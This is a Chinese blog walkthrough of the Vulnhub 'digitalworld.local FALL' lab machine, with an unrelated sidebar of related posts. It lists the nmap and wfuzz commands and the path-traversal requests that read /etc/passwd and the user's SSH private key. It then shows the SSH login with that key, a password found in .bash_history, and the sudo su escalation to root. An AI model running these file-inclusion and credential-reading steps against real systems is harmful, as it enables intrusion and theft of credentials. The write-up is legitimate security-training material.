Vulnhub:Digitalword.local (FALL)靶机

已于 2023-06-07 23:31:43 修改
阅读量153 收藏
点赞数
文章标签: 安全 网络安全 web安全
于 2023-04-15 14:10:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130169399
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

访问test.php,提示缺少参数

漏洞利用

wfuzz爆破参数

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 80 http://192.168.111.130/test.php?FUZZ=../../../../../../../../../../../../../etc/passwd

文件包含/etc/passwd,发现用户qiu

http://192.168.111.130/test.php?file=../../../../../../../../../etc/passwd

包含qiu用户的私钥

http://192.168.111.130/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

使用私钥登录

chmod 400 id_rsa
ssh qiu@192.168.111.130 -i id_rsa

提权

查看用户qiu家目录下的.bash_history文件,发现密码:remarkablyawesomE

用户qiu的sudo权限

提升为root

sudo su

ctostm
关注
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 276
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
以太Ethernaut靶场打靶—1 Fallback
weixin_49340699的博客
10-26 514
以太Ethernaut靶场打靶—1 Fallback 现在来到第一关,打靶主要还是先对智能合约进行审计如果没有学过的可以去https://cryptozombies.io/ 进行学习,有代码经验的还是能很快入门 源码审计 pragma solidity ^0.6.0; import '@openzeppelin/contracts/math/SafeMath.sol'; contract Fallback { using SafeMath for uint256; mapping(addre
靶机渗透练习60-digitalworld.localFALL
hirak0的博客
04-20 2115
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/ Description To celebrate the fifth year that the author has survived his infosec career, a new box has been born! This machine resembles a few different machines in the PEN-200 environm
Vulnhub Fall靶场 Walkthrough
RichardLuo
04-16 182
Vulnhub Fall靶场 Walkthrough
红队打靶练习:DIGITALWORLD.LOCAL: FALL
分享
12-25 723
红队打靶练习:DIGITALWORLD.LOCAL: FALL。文件上传的巧妙利用!!!犹如食鹫盘旋般的绝望感......
Vulnhub:Digitalworld.local (Development)靶机
qq_43884092的博客
04-09 568
访问development目录,提示存在一个流量包,查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php,访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错,根据报错搜索关键字
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub: InfoSec Prep:OSCP靶机
qq_43884092的博客
05-07 734
secret.txt获得ssh私钥,suid提权
Vulnhub:WebDeveloper:1靶机
qq_43884092的博客
03-27 266
目录爆破发现ipdata目录,进入该目录发现一个流量包,下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码
靶场:digitalworld.local: VENGEANCE
03-30
没有截图,但是有用的东西,全部都写上了 。一步一步来就能得到root。每一步都有描述,都有讲解。其中没有的部分,就没有卸载wp中,也不用操作,少走弯路。
Vulnhub-DIGITALWORLD.LOCAL: FALL渗透
laoyanCZ的博客
11-29 478
点我直接下载靶机
digitalworld.local:FALL 打靶记录
hackzkaq的博客
11-15 81
mysql的空密码登录一定要尝试。一些明显是开发遗存的文件记得要尝试FuZZ,说不定就是意想不到的结果。私钥登录时,注意私钥的权限。提权遍历时,要尽量仔细,不要遗漏。
靶机渗透练习41-Empire Lupin One
热门推荐
hirak0的博客
04-18 1万+
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/ Description Difficulty: Medium This box was created to be medium, but it can be hard if you get lost. CTF like box. You have to enumerate as much as you can. For hints discord Server ( https://d
Vulnhub靶机 Digitalworld.local (JOY)
菜浪马废的博客
05-03 837
ftp可以任何人登录 查看一下 查看version_control文件 看见:proftpd 1.3.5
Digitalworld.local (Development)--VulnHub靶机学习记录
weixin_45509443的博客
07-24 695
1.端口扫描 2.登录8080看下,根据说明有隐藏页面,然而nikto dirb等都无法目录扫描,应该也是像页面提示说的一样被入侵检测系统拦截了,那怎么找目录呢,这就有点脑洞了,原来隐藏目录就是html_pages 进入隐藏目录,接下来就是一顿翻目录了 最后在/development.html目录,查看源码发现提示,进入秘密页面 /developmentsecretpage 发现登录页面 ,无论输入什么都是报错,爆破注入什么的别想了,都是连接超时,smb服务爆破同样结局,看来..
vulnhub靶机-DIGITALWORLD.LOCAL: SNAKEOIL
臭nana的博客
09-10 1788
1、找到靶机ip:192.168.162.132 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????kali)-[~] └─# nmap -A -p- 192.168.116.132 Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for 192.168.116.132 Host is up (0.00033s latency). Not shown: 65533 c
DIGITALWORLD.LOCAL-BRAVERY靶场
qq_20032803的博客
02-04 674
1.发现主机/扫描 root@kali:~# nmap -sn 192.168.100.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 10:26 EST Nmap scan report for 192.168.100.1 Host is up (0.00051s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.100.2 Ho
网络安全 网络安全的主要领域 安全威胁 防护技术 安全策略 未来趋势
weixin_42462436的博客
10-03 1468
随着智能手机和平板电脑的广泛使用,移动设备的安全(如数据加密、设备丢失保护等)也成为重点。由国家级或高级黑客组织发起的持续性、高度隐蔽的网络攻击,通常以窃取敏感信息为目的。使用加密、访问控制、数据备份等手段来保护信息免受未经授权的访问、修改或删除。包括防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等技术的使用。保证操作系统和相关服务的安全,包括权限控制、补丁管理、系统日志监控等。利用全球收集的安全信息和分析工具,提前识别并防御潜在的威胁。关注对虚拟化平台、API安全、数据隔离和访问管理的控制。
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 539
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值